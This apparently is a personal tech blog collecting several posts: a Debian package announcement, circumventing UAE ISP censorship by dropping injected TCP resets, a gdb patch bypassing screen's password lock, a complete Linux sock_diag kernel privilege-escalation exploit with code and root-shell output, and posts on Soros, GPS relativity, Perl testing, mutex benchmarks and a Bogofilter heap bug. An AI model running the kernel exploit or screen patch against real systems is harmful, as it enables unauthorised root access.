I’m very pleased to announce that a little program of mine called
nocache has officially made it into the Debian distribution and
migrated to Debian testing just a few days ago.
The tool started out as a small hack that employs mmap and mincore
to check which blocks of a file are already in the Linux FS cache, and
uses this info in the intercepted libc’s open/close syscall
wrappers and related functions in an effort to restore the cache to its
pristine state after every file access.
I only wrote this tool as a little “proof of concept”, but it seems there are people out there actually using this, which is nice.
A couple of links:
My thanks go out to Dmitry who packaged and will be maintaining the tool for Debian – as well as the other people who engaged in the lively discussions in the issue tracker.
The internet is censored in the UAE. Not really bad like in China – it’s rather used to restrict access to “immoral content”. Because you know, the internet is full of porn and Danish people making fun of The Prophet. – Also, downloading Skype is forbidden (but using it is not).
I have investigated the censorship mechanism of one of the two big providers and will describe the techniques in use and how to effectively circumvent the block.
If you navigate to a “forbidden page” in the UAE, you’ll be presented with a screen warning you that it is illegal under the Internet Access Management Regulatory Policy to view that page.
This is actually implemented in a pretty rudimentary, yet effective
way (if you have no clue how TCP/IP works). If a request to a
forbidden resource is made, the connection is immediately shut down by
the proxy. In the shutdown packet, an <iframe> code is placed that
displays the image:
<iframe src="http://94.201.7.202:8080/webadmin/deny/index.php?dpid=20&
dpruleid=7&cat=105&ttl=0&groupname=Du_Public_IP_Address&policyname=default&
username=94.XX.0.0&userip=94.XX.XX.XX&connectionip=1.0.0.127&
nsphostname=YYYYYYYYYY.du.ae&protocol=nsef&dplanguage=-&url=http%3a%2f%2f
pastehtml%2ecom%2fview%2fc336prjrl%2ertxt"
width="100%" height="100%" frameborder=0></iframe>
Capturing the TCP packets while making a forbidden request – in this case: a
list of banned URLs in the UAE, which itself is banned – reveals one crucial
thing: The GET request actually reaches the web server, but before the answer
arrives, the proxy has already sent the Reset-Connection-Packets. (Naturally,
that is much faster, because it is physically closer.)
Because the client thinks the connection is closed, it will itself send out Reset-Packets to the Webserver in reply to its packets containing the reply (“the webpage”). This actually shuts down the connection in both directions. All of this happens on the TCP level, thus by “client” I mean the operating system. The client application just opens a TCP socket and sees it closed via the result code coming from the OS.
You can see the initial reset-packets from the proxy as entries 5 und 6 in the list; the later RST packets originate from my computer because the TCP stack considers the connection closed.
First, we need to find out at which point our HTTP connection is being hijacked. To do this, we search for the characteristic TCP packet with the FIN, PSH, ACK bits set, while making a request that is blocked. The output will be something like:
$ sudo tcpdump -v "tcp[13] = 0x019"
18:38:35.368715 IP (tos 0x0, ttl 57, ... proto TCP (6), length 522)
host-88-80-29-58.cust.prq.se.http > 192.168.40.73.37630: Flags [FP.], ...
We are only interested in the TTL of the FIN-PSH-ACK packets: By substracting this from the default TTL of 64 (which the provider seems to be using), we get the number of hops the host is away. Looking at a traceroute we see that obviously, the host that is 64 - 57 = 7 hops away is located at the local ISP. (Never mind the un-routable 10.* appearing in the traceroute. Seeing this was the initial reason for me to think these guys are not too proficient in network technology, no offense.)
$ mtr --report --report-wide --report-cycles=1 pastehtml.com
HOST: mjanja Loss% Snt Last Avg Best Wrst StDev
1.|-- 192.168.40.1 0.0% 1 2.9 2.9 2.9 2.9 0.0
2.|-- 94.XX.XX.XX 0.0% 1 2.9 2.9 2.9 2.9 0.0
3.|-- 10.XXX.0.XX 0.0% 1 2.9 2.9 2.9 2.9 0.0
4.|-- 10.XXX.0.XX 0.0% 1 2.9 2.9 2.9 2.9 0.0
5.|-- 10.100.35.78 0.0% 1 6.8 6.8 6.8 6.8 0.0
6.|-- 94.201.0.2 0.0% 1 7.7 7.7 7.7 7.7 0.0
7.|-- 94.201.0.25 0.0% 1 8.4 8.4 8.4 8.4 0.0
8.|-- 195.229.27.85 0.0% 1 11.1 11.1 11.1 11.1 0.0
9.|-- csk012.emirates.net.ae 0.0% 1 27.3 27.3 27.3 27.3 0.0
10.|-- 195.229.3.215 0.0% 1 146.6 146.6 146.6 146.6 0.0
11.|-- decix-ge-2-7.i2b.se 0.0% 1 156.2 156.2 156.2 156.2 0.0
12.|-- sth-cty1-crdn-1-po1.i2b.se 0.0% 1 164.7 164.7 164.7 164.7 0.0
13.|-- 178.16.212.57 0.0% 1 151.6 151.6 151.6 151.6 0.0
14.|-- cust-prq-nt.i2b.se 0.0% 1 157.5 157.5 157.5 157.5 0.0
15.|-- tunnel3.prq.se 0.0% 1 161.5 161.5 161.5 161.5 0.0
16.|-- host-88-80-29-58.cust.prq.se 0.0% 1 192.5 192.5 192.5 192.5 0.0
We now know that with a very high probability, all “connection termination” attempts from this close to us – relative to a TTL of 64, which is set by the sender – are the censorship proxy doing its work. So we simply ignore all packets with the RST or FIN flag set that come from port 80 too close to us:
for mask in FIN,PSH,ACK RST,ACK; do
sudo iptables -I INPUT -p tcp --sport 80 \
-m tcp --tcp-flags $mask $mask \
-m ttl --ttl-gt 55 -m ttl --ttl-lt 64 \
-j DROP;
done
NB: This checks for the TTL greater than, so we have to check for greater 56 and substract one to be one the safe side. You can also leave out the TTL part, but then “regular” TCP terminations remain unseen by the OS, which many programs will find weird (and sometimes data comes with a package that closes the connection, and this data would be lost).
That’s it. Since the first reply packet from the server is
dropped, or rather replaced with the packet containing the <iframe>
code, we rely on TCP retransmission, and sure enough, some 0.21 seconds
later the same TCP packet is retransmitted, this time not harmed in
any way:

The OS re-orders the packets and is able to assemble the TCP stream. Thus, by simply ignoring two packets the provider sends to us, we have an (almost perfectly) working TCP connection to where-ever we want.
I suppose the provider is using relatively old Cisco equipment. For example, some of their documentation hints at how the filtering is implemented. See this PDF, p. 39-5:
When filtering is enabled and a request for content is directed through the security appliance, the request is sent to the content server and to the filtering server at the same time. If the filtering server allows the connection, the security appliance forwards the response from the content server to the originating client. If the filtering server denies the connection, the security appliance drops the response and sends a message or return code indicating that the connection was not successful.
The other big provider in the UAE uses a different filtering technique, which does not rely on TCP hacks but employs a real HTTP proxy. (I heard someone mention “Bluecoat” but have no data to back it up.)
The famous screen program – luckily by now mostly obsolete thanks to tmux – has a feature to “password lock” a session. The manual:
This is useful if you have privileged programs running under screen and you want to protect your session from reattach attempts by another user masquerading as your uid (i.e. any superuser.)
This is of course utter crap. As the super user, you can do anything you like, including changing a program’s executable at run time, which I want to demonstrate for screen as a POC.
The password is checked on the server side (which usually runs with setuid root) here:
if (strncmp(crypt(pwdata->buf, up), up, strlen(up))) {
...
AddStr("\r\nPassword incorrect.\r\n");
...
}
If I am root, I can patch the running binary. Ultimately, I want to circumvent this passwordcheck. But we need to do some preparation:
First, find the string about the incorrect password that is passed to
AddStr. Since this is a compile-time constant, it is stored in the
.rodata section of the ELF.
Just fire up GDB on the screen binary, list the sections (redacted for brevity here)…
(gdb) maintenance info sections
Exec file:
`/usr/bin/screen', file type elf64-x86-64.
...
0x00403a50->0x0044ee8c at 0x00003a50: .text ALLOC LOAD READONLY CODE HAS_CONTENTS
0x0044ee8c->0x0044ee95 at 0x0004ee8c: .fini ALLOC LOAD READONLY CODE HAS_CONTENTS
0x0044eea0->0x00458a01 at 0x0004eea0: .rodata ALLOC LOAD READONLY DATA HAS_CONTENTS
...
… and search for said string in the .rodata section:
(gdb) find 0x0044eea0, 0x00458a01, "\r\nPassword incorrect.\r\n"
0x45148a
warning: Unable to access target memory at 0x455322, halting search.
1 pattern found.
Now, we need to locate the piece of code comparing the password. Let’s
first search for the call to AddStr by taking advantage of the fact
that we know the address of the string that will be passed as the
argument. We search in .text for the address of the string:
(gdb) find 0x00403a50, 0x0044ee8c, 0x45148a
0x41b371
1 pattern found.
Now there should be a jne instruction shortly before that (this
instruction stands for “jump if not equal” and has the opcode 0x75).
Let’s search for it:
(gdb) find/b 0x41b371-0x100, +0x100, 0x75
0x41b2f2
1 pattern found.
Decode the instruction:
(gdb) x/i 0x41b2f2
0x41b2f2: jne 0x41b370
This is it. (If you want to be sure, search the instructions before
that. Shortly before that, at 0x41b2cb, I find: callq 403120 <strncmp@plt>.)
Now we can simply patch the live binary, changing 0x75 to 0x74 (jne
to je or “jump if equal”), thus effectively inverting the if
expression. Find the screen server process (it’s written in all caps
in the ps output, i.e. SCREEN) and patch it like this, where
=(cmd) is a Z-Shell shortcut for “create temporary file and delete
it after the command finishes”:
$ sudo gdb -batch -p 23437 -x =(echo "set *(unsigned char *)0x41b2f2 = 0x74\nquit")
All done. Just attach using screen -x, but be sure not to enter
the correct password: That’s the only one that will not give you
access now.
So my friend Nico tweeted that there is an „easy linux kernel privilege escalation“ and pointed to a fix from three days ago. If that’s so easy, I thought, then I’d like to try: And thus I wrote my first Kernel exploit. I will share some details here. I guess it is pointless to withhold the details or a fully working exploit, since some russians have already had an exploit for several months, and there seem to be several similar versions flying around the net, I discovered later. They differ in technique and reliability, and I guess others can do better than me.
I have no clue what the NetLink subsystem really is, but never mind. The commit description for the fix says:
Userland can send a netlink message requesting SOCK_DIAG_BY_FAMILY with a family greater or equal then AF_MAX -- the array size of sock_diag_handlers[]. The current code does not test for this condition therefore is vulnerable to an out-of-bound access opening doors for a privilege escalation.
So we should do exactly that! One of the hardest parts was actually
finding out how to send such a NetLink message, but I’ll come to that
later. Let’s first have a look at the code that was patched (this is
from net/core/sock_diag.c):
static int __sock_diag_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh)
{
int err;
struct sock_diag_req *req = nlmsg_data(nlh);
const struct sock_diag_handler *hndl;
if (nlmsg_len(nlh) < sizeof(*req))
return -EINVAL;
/* check for "req->sdiag_family >= AF_MAX" goes here */
hndl = sock_diag_lock_handler(req->sdiag_family);
if (hndl == NULL)
err = -ENOENT;
else
err = hndl->dump(skb, nlh);
sock_diag_unlock_handler(hndl);
return err;
}
The function sock_diag_lock_handler() locks a mutex and effectively
returns sock_diag_handlers[req->sdiag_family], i.e. the unsanitized
family number received in the NetLink request. Since AF_MAX is 40,
we can effectively return memory from after the end of
sock_diag_handlers (“out-of-bounds access”) if we specify a family
greater or equal to 40. This memory is accessed as a
struct sock_diag_handler {
__u8 family;
int (*dump)(struct sk_buff *skb, struct nlmsghdr *nlh);
};
… and err = hndl->dump(skb, nlh); calls the function pointed to in
the dump field.
So we know: The Kernel follows a pointer to a sock_diag_handler
struct, and calls the function stored there. If we find some
suitable and (more or less) predictable value after the end of the
array, then we might store a specially crafted struct at the
referenced address that contains a pointer to some code that will
escalate the privileges of the current process. The main function
looks like this:
int main(int argc, char **argv)
{
prepare_privesc_code();
spray_fake_handler((void *)0x0000000000010000);
trigger();
return execv("/bin/sh", (char *[]) { "sh", NULL });
}
First, we need to store some code that will escalate the privileges. I found these slides and this ksplice blog post helpful for that, since I’m not keen on writing assembly.
/* privilege escalation code */
#define KERNCALL __attribute__((regparm(3)))
void * (*prepare_kernel_cred)(void *) KERNCALL;
void * (*commit_creds)(void *) KERNCALL;
/* match the signature of a sock_diag_handler dumper function */
int privesc(struct sk_buff *skb, struct nlmsghdr *nlh)
{
commit_creds(prepare_kernel_cred(0));
return 0;
}
/* look up an exported Kernel symbol */
void *findksym(const char *sym)
{
void *p, *ret;
FILE *fp;
char s[1024];
size_t sym_len = strlen(sym);
fp = fopen("/proc/kallsyms", "r");
if(!fp)
err(-1, "cannot open kallsyms: fopen");
ret = NULL;
while(fscanf(fp, "%p %*c %1024s\n", &p, s) == 2) {
if(!!strncmp(sym, s, sym_len))
continue;
ret = p;
break;
}
fclose(fp);
return ret;
}
void prepare_privesc_code(void)
{
prepare_kernel_cred = findksym("prepare_kernel_cred");
commit_creds = findksym("commit_creds");
}
This is pretty standard, and you’ll find many variations of that in different exloits.
Now we spray a struct containing this function pointer over a sizable amount of memory:
void spray_fake_handler(const void *addr)
{
void *pp;
int po;
/* align to page boundary */
pp = (void *) ((ulong)addr & ~0xfffULL);
pp = mmap(pp, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
if(pp == MAP_FAILED)
err(-1, "mmap");
struct sock_diag_handler hndl = { .family = AF_INET, .dump = privesc };
for(po = 0; po < 0x10000; po += sizeof(hndl))
memcpy(pp + po, &hndl, sizeof(hndl));
}
The memory is mapped with MAP_FIXED, which makes mmap() take the
memory location as the de facto location, not merely a hint. The
location must be a multiple of the page size (which is 4096 or 0x1000
by default), and on most modern systems you cannot map the zero-page
(or other low pages), consult sysctl vm.mmap_min_addr for this.
(This is to foil attempts to map code to the zero-page to take
advantage of a Kernel NULL pointer derefence.)
Now for the actual trigger. To get an idea of what we can do, we
should first inspect what comes after the sock_diag_handlers array
in the currently running Kernel (this is only possible with root
permissions). Since the array is static to that file, we cannot look up
the symbol. Instead, we look up the address of a function that
accesses said array, sock_diag_register():
$ grep -w sock_diag_register /proc/kallsyms
ffffffff812b6aa2 T sock_diag_register
If this returns all zeroes, try grepping in /boot/System.map-$(uname -r)
instead. Then disassemble the function. I annotated the relevant
points with the corresponding C code:
$ sudo gdb -c /proc/kcore
(gdb) x/23i 0xffffffff812b6aa2
0xffffffff812b6aa2: push %rbp
0xffffffff812b6aa3: mov %rdi,%rbp
0xffffffff812b6aa6: push %rbx
0xffffffff812b6aa7: push %rcx
0xffffffff812b6aa8: cmpb $0x27,(%rdi) ; if (hndl->family >= AF_MAX)
0xffffffff812b6aab: ja 0xffffffff812b6ae5
0xffffffff812b6aad: mov $0xffffffff81668c20,%rdi
0xffffffff812b6ab4: mov $0xfffffff0,%ebx
0xffffffff812b6ab9: callq 0xffffffff813628ee ; mutex_lock(&sock_diag_table_mutex);
0xffffffff812b6abe: movzbl 0x0(%rbp),%eax
0xffffffff812b6ac2: cmpq $0x0,-0x7e7fe930(,%rax,8) ; if (sock_diag_handlers[hndl->family])
0xffffffff812b6acb: jne 0xffffffff812b6ad7
0xffffffff812b6acd: mov %rbp,-0x7e7fe930(,%rax,8) ; sock_diag_handlers[hndl->family] = hndl;
0xffffffff812b6ad5: xor %ebx,%ebx
0xffffffff812b6ad7: mov $0xffffffff81668c20,%rdi
0xffffffff812b6ade: callq 0xffffffff813628db
0xffffffff812b6ae3: jmp 0xffffffff812b6aea
0xffffffff812b6ae5: mov $0xffffffea,%ebx
0xffffffff812b6aea: pop %rdx
0xffffffff812b6aeb: mov %ebx,%eax
0xffffffff812b6aed: pop %rbx
0xffffffff812b6aee: pop %rbp
0xffffffff812b6aef: retq
The syntax cmpq $0x0,-0x7e7fe930(,%rax,8) means: check if the value
at the address -0x7e7fe930 (which is a shorthand for
0xffffffff818016d0 on my system) plus 8 times %rax is zero – eight
being the size of a pointer on a 64-bit system, and %rax
the address of the first argument to the function, but at the same
time, if you only take one 64-bit-slice, the first member of the (not
packed) struct, i.e. the family field. So this line is an array
access, and we know that sock_diag_handlers is located at -0x7e7fe930.
(All these steps can actually be done without root permissions: You
can unpack the Kernel with something like k=/boot/vmlinuz-$(uname -r)
&& dd if=$k bs=1 skip=$(perl -e 'read STDIN,$k,1024*1024; print
index($k, "\x1f\x8b\x08\x00");' <$k) | zcat >| vmlinux and start
GDB on the resulting ELF file. Only now you actually need to inspect
the main memory.)
(gdb) x/46xg -0x7e7fe930
0xffffffff818016d0: 0x0000000000000000 0x0000000000000000
0xffffffff818016e0: 0x0000000000000000 0x0000000000000000
0xffffffff818016f0: 0x0000000000000000 0x0000000000000000
0xffffffff81801700: 0x0000000000000000 0x0000000000000000
0xffffffff81801710: 0x0000000000000000 0x0000000000000000
0xffffffff81801720: 0x0000000000000000 0x0000000000000000
0xffffffff81801730: 0x0000000000000000 0x0000000000000000
0xffffffff81801740: 0x0000000000000000 0x0000000000000000
0xffffffff81801750: 0x0000000000000000 0x0000000000000000
0xffffffff81801760: 0x0000000000000000 0x0000000000000000
0xffffffff81801770: 0x0000000000000000 0x0000000000000000
0xffffffff81801780: 0x0000000000000000 0x0000000000000000
0xffffffff81801790: 0x0000000000000000 0x0000000000000000
0xffffffff818017a0: 0x0000000000000000 0x0000000000000000
0xffffffff818017b0: 0x0000000000000000 0x0000000000000000
0xffffffff818017c0: 0x0000000000000000 0x0000000000000000
0xffffffff818017d0: 0x0000000000000000 0x0000000000000000
0xffffffff818017e0: 0x0000000000000000 0x0000000000000000
0xffffffff818017f0: 0x0000000000000000 0x0000000000000000
0xffffffff81801800: 0x0000000000000000 0x0000000000000000
0xffffffff81801810: 0x0000000000000000 0x0000000000000000
0xffffffff81801820: 0x000000000000000a 0x0000000000017570
0xffffffff81801830: 0xffffffff8135a666 0xffffffff816740a0
(gdb) p (0xffffffff81801828- -0x7e7fe930)/8
$1 = 43
So now I know that in the Kernel I’m currently running, at the current
moment, sock_diag_handlers[43] is 0x0000000000017570, which is a
low address, but hopefully not too low. (Nico reported 0x17670, and a
current grml live cd in KVM
has 0x17470 there.) So we need to send a NetLink message with
SOCK_DIAG_BY_FAMILY type set in the header, flags at least
NLM_F_REQUEST and the family set to 43. This is what the trigger
does:
void trigger(void)
{
int nl = socket(PF_NETLINK, SOCK_RAW, 4 /* NETLINK_SOCK_DIAG */);
if (nl < 0)
err(-1, "socket");
struct {
struct nlmsghdr hdr;
struct sock_diag_req r;
} req;
memset(&req, 0, sizeof(req));
req.hdr.nlmsg_len = sizeof(req);
req.hdr.nlmsg_type = SOCK_DIAG_BY_FAMILY;
req.hdr.nlmsg_flags = NLM_F_REQUEST;
req.r.sdiag_family = 43; /* guess right offset */
if(send(nl, &req, sizeof(req), 0) < 0)
err(-1, "send");
}
All done! Compiling might be difficult, since you need Kernel struct
definitions. I used -idirafter and my Kernel headers.
$ make
gcc -g -Wall -idirafter /usr/src/linux-headers-`uname -r`/include -o kex kex.c
$ ./kex
# id
uid=0(root) gid=0(root) groups=0(root)
Note: If something goes wrong, you’ll get a “general protection fault: 0000 [#1] SMP” that looks scary like this:
But by pressing Ctrl-Alt-F1 and -F7 you’ll get the display back. However, the exploit will not work anymore until you have rebooted. I don’t know the reason for this, but it sure made the development cycle an annoying one…
Update: The Protection Fault occurs when first following a bogous function pointer. After that, the exploit cannot longer work because the mutex is still locked and cannot be unlocked. (Thanks, Nico!)
Ich habe den besseren Teil des heutigen Abends damit verbracht, die „Reflexivity Lectures“ von George Soros aus dem Jahre 2009 zu lesen, und bin tief beeindruckt. Soros legt in den fünf sehr zugänglichen Vorlesungen seine Theorie der Reflexivität dar, und wendet sie auf Marktwirtschaft und Politik an.
Ich habe mich im vergangenen Jahr relativ viel mit behavioral economics („Verhaltensökonomik“, siehe z.B. Kahnemann) und Poststrukturalismus als Philosophie beschäftigt. Beide Theorien spielen eine Rolle in der Argumentation Soros’, insgesamt geht es sehr viel darum, wie wir mit fallacies, also Fehlschlüssen, umgehen können und sollen.
Aus dem Schluss des ersten Teils:
But by far the most impressive attempt [to eliminate the difficulties connected with the human uncertainty principle] has been mounted by economic theory. It started out by assuming perfect knowledge and when that assumption turned out to be untenable it went through ever increasing contortions to maintain the fiction of rational behavior. Economics ended up with the theory of rational expectations which maintains that there is a single optimum view of the future, that which corresponds to it, and eventually all the market participants will converge around that view. This postulate is absurd but it is needed in order to allow economic theory to model itself on Newtonian physics.
Der zweite Teil beschäftigt sich mit den Implikationen der Reflexivität auf Marktsysteme; besonders interessant ist dabei die Feststellung, dass die Erkenntnisse der Verhaltensökonomik nur die eine Seite der Medallie darstellen. Teil drei re-interpretiert den Popper’schen Begriff der Open Society, und Soros führt in Teil vier die Inkompatibilitäten eines Kapitalismus’ Chicagoer Schule zu einer Offenen Gesellschaft auf.
Der fünfte Teil bietet eine Zusammenfassung sowie einen Ausblick. Aus heutiger Sicht sind einige der Hoffnungen leider etwas utopisch. Die erwähnten Gefahren sind aber sehr wohl noch prävalent.
Unbedingte Leseempfehlung.
Irgendwie habe ich nie wirklich darüber nachgedacht – aber natürlich unterliegen die Atomuhren in den GPS-Satelliten relativistischen Effekten, die man kompensieren muss:
For GPS satellites, GR [General Relativity Theory] predicts that the atomic clocks at GPS orbital altitudes will tick faster by about 45,900 ns/day because they are in a weaker gravitational field than atomic clocks on Earth's surface. Special Relativity (SR) predicts that atomic clocks moving at GPS orbital speeds will tick slower by about 7,200 ns/day than stationary ground clocks. Rather than have clocks with such large rate differences, the satellite clocks are reset in rate before launch to compensate for these predicted effects. In practice, simply changing the international definition of the number of atomic transitions that constitute a one-second interval accomplishes this goal. Therefore, we observe the clocks running at their offset rates before launch. Then we observe the clocks running after launch and compare their rates with the predictions of relativity, both GR and SR combined. If the predictions are right, we should see the clocks run again at nearly the same rates as ground clocks, despite using an offset definition for the length of one second.
The standard book Perl Best Practices advises in chapter 4.5 that
one should use the Readonly Perl module instead of the
constant standard module for various reasons.
An example might look like this:
package Myprogram;
use Exporter;
use Readonly;
our @EXPORT = qw(conffile);
Readonly our $BASEPATH => "$ENV{HOME}/.myprogram";
sub conffile { "$BASEPATH/config.ini" }
If you want to unit test your program now, you cannot just mess around
and replace a potentially existing config file with a bogous
one. You have to create a temporary directory and use that as the base
path. That is, you have to modify your Readonly declared variable.
I’ve not seen this documented, so I guess this might help others:
Internally the method Readonly::Scalar::STORE is called when you do
an assignment (see man perltie for details). In Readonly.pm, this is
redefined to
*STORE = *UNTIE = sub {Readonly::croak $Readonly::MODIFY};
which dies with an error message. So you only have to circumvent this.
The method STORE gets a reference of the location as first argument,
and the value as second argument. So a quick-and-dirty workaround is
just setting
*Readonly::Scalar::STORE = sub { ${$_[0]} = $_[1]; };
prior to assigning to the Readonly variable. If you want to do it properly, you should only change this locally in the block where you re-assign the value, so that subsequent attempts will again produce the usual error message. Such a test might look like this:
use strict;
use warnings;
use Test::More 'no_plan';
use Myprogram;
{
no warnings 'redefine';
local *Readonly::Scalar::STORE = sub { ${$_[0]} = $_[1]; };
$Myprogram::BASEPATH = "/tmp";
}
is(Myprogram::conffile, "/tmp/config.ini", "get config filename");
For non-scalar values, this will probably work similar. (Read the source if in doubt.)
So I was reading some rather not so clever code today. I had a gut
feeling something was wrong with the code, since I had never seen an
idiom like that. A server that does a little hash calculation with
lots of threads – and the function that computes the hash had a
peculiar feature: Its entire body was wrapped by a mutex lock/unlock
clause of a function-static mutex PTHREAD_MUTEX_INITIALIZER, like
this:
static EVP_MD_CTX mdctx;
static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
static unsigned char first = 1;
pthread_mutex_lock(&lock);
if (first) {
EVP_MD_CTX_init(&mdctx);
first = 0;
}
/* the actual hash computation using &mdctx */
pthread_mutex_unlock(&lock);
In other words, if this function is called multiple times from different threads, it is only run once at a time, possibly waiting for other instances to unlock the (shared) mutex first.
The computation code inside the function looks roughly like this:
if (!EVP_DigestInit_ex(&mdctx, EVP_sha256(), NULL) ||
!EVP_DigestUpdate(&mdctx, input, inputlen) ||
!EVP_DigestFinal(&mdctx, hash, &md_len)) {
ERR_print_errors_fp(stderr);
exit(-1);
}
This is the typical OpenSSL pattern: You tell it to initialize mdctx to
compute the SHA256 digest, then you “update” the digest (i.e., you
feed it some bytes) and then you tell it to finish, storing the
resulting hash in hash. If either of the functions fail, the OpenSSL
error is printed.
So the lock mutex really only protects the mdctx (short for
‘message digest context’). And my gut feeling was that re-initializing the
context all the time (i.e. copying stuff around) is much cheaper
than synchronizing all the hash operations (i.e., having one stupid
bottleneck).
To be sure, I ran a few tests. I wrote a simple C program that scales up the number of threads and looks at how much time you need to hash 10 million 16-byte strings. (You can find the whole quick’n’dirty code on Github.)
First, I have to create a dataset. In order for it to be the same all
the time, I use rand_r() with a hard-coded seed, so that over all
iterations, the random data set is actually equivalent:
#define DATANUM 10000000
#define DATASIZE 16
static char data[DATANUM][DATASIZE];
void init_data(void)
{
int n, i;
unsigned int seedp = 0xdeadbeef; /* make the randomness predictable */
char alpha[] = "abcdefghijklmnopqrstuvwxyz";
for(n = 0; n < DATANUM; n++)
for(i = 0; i < DATASIZE; i++)
data[n][i] = alpha[rand_r(&seedp) % 26];
}
Next, you have to give a helping hand to OpenSSL so that it can be run multithreaded. (There are, it seems, certain internal data structures that need protection.) This is a technical detail.
Then I start num threads on equally-sized slices of data while recording and
printing out timing statistics:
void hash_all(int num)
{
int i;
pthread_t *t;
struct fromto *ft;
struct timespec start, end;
double delta;
clock_gettime(CLOCK_MONOTONIC, &start);
t = malloc(num * sizeof *t);
for(i = 0; i < num; i++) {
ft = malloc(sizeof(struct fromto));
ft->from = i * (DATANUM/num);
ft->to = ((i+1) * (DATANUM/num)) > DATANUM ?
DATANUM : (i+1) * (DATANUM/num);
pthread_create(&t[i], NULL, hash_slice, ft);
}
for(i = 0; i < num; i++)
pthread_join(t[i], NULL);
clock_gettime(CLOCK_MONOTONIC, &end);
delta = end.tv_sec - start.tv_sec;
delta += (end.tv_nsec - start.tv_nsec) / 1000000000.0;
printf("%d threads: %ld hashes/s, total = %.3fs\n",
num, (unsigned long) (DATANUM / delta), delta);
free(t);
sleep(1);
}
Each thread runs the hash_slice() function, which linearly iterates
over the slice and calls hash_one(n) for each entry. With
preprocessor macros, I define two versions of this function:
void hash_one(int num)
{
int i;
unsigned char hash[EVP_MAX_MD_SIZE];
unsigned int md_len;
#ifdef LOCK_STATIC_EVP_MD_CTX
static EVP_MD_CTX mdctx;
static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
static unsigned char first = 1;
pthread_mutex_lock(&lock);
if (first) {
EVP_MD_CTX_init(&mdctx);
first = 0;
}
#else
EVP_MD_CTX mdctx;
EVP_MD_CTX_init(&mdctx);
#endif
/* the actual hashing from above */
#ifdef LOCK_STATIC_EVP_MD_CTX
pthread_mutex_unlock(&lock);
#endif
return;
}
The Makefile produces two binaries:
$ make
gcc -Wall -pthread -lrt -lssl -DLOCK_STATIC_EVP_MD_CTX -o speedtest-locked speedtest.c
gcc -Wall -pthread -lrt -lssl -o speedtest-copied speedtest.c
… and the result is as expected. On my Intel i7-2620M quadcore:
$ ./speedtest-copied
1 threads: 1999113 hashes/s, total = 5.002s
2 threads: 3443722 hashes/s, total = 2.904s
4 threads: 3709510 hashes/s, total = 2.696s
8 threads: 3665865 hashes/s, total = 2.728s
12 threads: 3650451 hashes/s, total = 2.739s
24 threads: 3642619 hashes/s, total = 2.745s
$ ./speedtest-locked
1 threads: 2013590 hashes/s, total = 4.966s
2 threads: 857542 hashes/s, total = 11.661s
4 threads: 631336 hashes/s, total = 15.839s
8 threads: 932238 hashes/s, total = 10.727s
12 threads: 850431 hashes/s, total = 11.759s
24 threads: 802501 hashes/s, total = 12.461s
And on an Intel Xeon X5650 24 core machine:
$ ./speedtest-copied
1 threads: 1564546 hashes/s, total = 6.392s
2 threads: 1973912 hashes/s, total = 5.066s
4 threads: 3821067 hashes/s, total = 2.617s
8 threads: 5096136 hashes/s, total = 1.962s
12 threads: 5849133 hashes/s, total = 1.710s
24 threads: 7467990 hashes/s, total = 1.339s
$ ./speedtest-locked
1 threads: 1481025 hashes/s, total = 6.752s
2 threads: 701797 hashes/s, total = 14.249s
4 threads: 338231 hashes/s, total = 29.566s
8 threads: 318873 hashes/s, total = 31.360s
12 threads: 402054 hashes/s, total = 24.872s
24 threads: 304193 hashes/s, total = 32.874s
So, while the real computation times shrink when you don’t force a bottleneck – yes, it’s an embarrassingly parallel problem – the reverse happens if you force synchronization: All the mutex waiting slows the program so much down that you’d better only use one thread or else you lose.
Rule of thumb: If you don’t have a good argument for a multithreading application, simply don’t take the extra effort of implementing it in the first place.
In mid-2010 I found a heap corruption in Bogofilter which lead to the Security Advisory 2010-01, CVE-2010-2494 and a new release. – Some weeks ago I found another similar bug, so there’s a new Bogofilter release since yesterday, thanks to the maintainers. (Neither of the bugs have much potential for exploitation, for different reasons.)
I want to shed some light on the details about the new CVE-2012-5468 here: It’s a very subtle bug that rises from the error handling of the character set conversion library iconv.
The Bogofilter Security Advisory 2012-01 contains no real information about the source of the heap corruption. The full description in the advisory is this:
Julius Plenz figured out that bogofilter's/bogolexer's base64 could overwrite heap memory in the character set conversion in certain pathological cases of invalid base64 code that decodes to incomplete multibyte characters.
The problematic code doesn’t look problematic on first glance. Neither on
second glance. Take a look yourself.
The version here is redacted for brevity: Convert from inbuf to
outbuf, handling possible iconv-failures.
count = iconv(xd, (ICONV_CONST char **)&inbuf, &inbytesleft, &outbuf, &outbytesleft);
if (count == (size_t)(-1)) {
int err = errno;
switch (err) {
case EILSEQ: /* invalid multibyte sequence */
case EINVAL: /* incomplete multibyte sequence */
if (!replace_nonascii_characters)
*outbuf = *inbuf;
else
*outbuf = '?';
/* update counts and pointers */
inbytesleft -= 1;
outbytesleft -= 1;
inbuf += 1;
outbuf += 1;
break;
case E2BIG: /* output buffer has no more room */
/* TODO: Provide proper handling of E2BIG */
done = true;
break;
default:
break;
}
}
The iconv API is simple and straightforward: You pass a handle
(which among other things contains the source and destination
character set; it is called xd here), and two buffers and modifiable
integers for the input and output, respectively. (Usually, when
transcoding, the function reads one symbol from the source, converts
it to another character set, and then “drains” the input buffer by
decreasing inbytesleft by the number of bytes that made up the
source symbol. Then, the output lenght is checked, and if the target
symbol fits, it is appended and the outbytesleft integer is
decreased by how much space the symbol used.)
The API function returns -1 in case of an error.
The Bogofilter code contains a copy&paste of the error cases from the iconv(3)
man page. If you read the libiconv source
carefully,
you’ll find that …
/* Case 2: not enough bytes available to detect anything */
errno = EINVAL;
comes before
/* Case 4: k bytes read, making up a wide character */
if (outleft == 0) {
cd->istate = last_istate;
errno = E2BIG;
...
}
So the “certain pathological cases” the SA talks about are met if a
substantially large chunk of data makes iconv return -1, because
this chunk just happens to end in an invalid multibyte sequence.
But at that point you have no guarantee from the library that your
output buffer can take any more bytes. Appending that character or a
? sign causes an out-ouf-bounds write. (This is really subtle. I
don’t blame anyone for not noticing this, although sanity checks – if
need be via assert(outbytesleft > 0) – are always in order when
you do complicated modify-string-on-copy stuff.) Additionally,
outbytesleft will be decreased to -1 and thus even an
outbytesleft == 0 will return false.
Once you know this, the fix is trivial. And if you dig deep enough in their SVN, there’s my original test to reproduce this.
